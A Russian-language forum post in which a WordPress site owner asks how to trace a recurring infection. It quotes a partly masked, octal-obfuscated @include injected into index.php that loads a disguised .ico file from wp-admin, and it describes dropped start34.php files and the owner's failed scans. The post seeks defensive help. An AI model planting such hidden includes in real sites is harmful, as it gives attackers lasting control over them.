Всем привет! Ребят подскажите как определить источник вируса.
Есть хостинг, на нем есть 3 WP сайта, и с некой периодичностью в файле index.phpкорня одного из сайтов появляется такая вставка:
@include "\****\167w\***\141n\144o\162_\154i\1562\*\1544e\1646k\*\1643t\0456c\157m\057w\160-\141d\155i\156/\156e\164w\157r\153/\056c\0658\1457\0711\063.\151c\157";
этот код я декодирую с помощью
https://malwaredecoder.com/ и вижу путь с вирусному файлу, содержимое которого -
https://i.imgur.com/dkslnSo.png
а вот эти символы - проценты, цифры я уже никак не смог декодировать, вроде бы похожи на URL декодированный, но нет. Я так понимаю функция этого файла состоит в создании потом в корне сайтов вот таких рандомных файлов - start34.php с содержимым -
https://i.imgur.com/Hsyusb8.png То есть вредительство состоит из таких трех частей.
Пробовал все сайты загружать локал и проходиться по ним evisium.com/kb/scan_site_windows.html массу всего находило, удалял, но все равно появляется эта дрянь. Дампы баз выгружал, искал вхождение base64 и Evil, но базы чистые
Средний
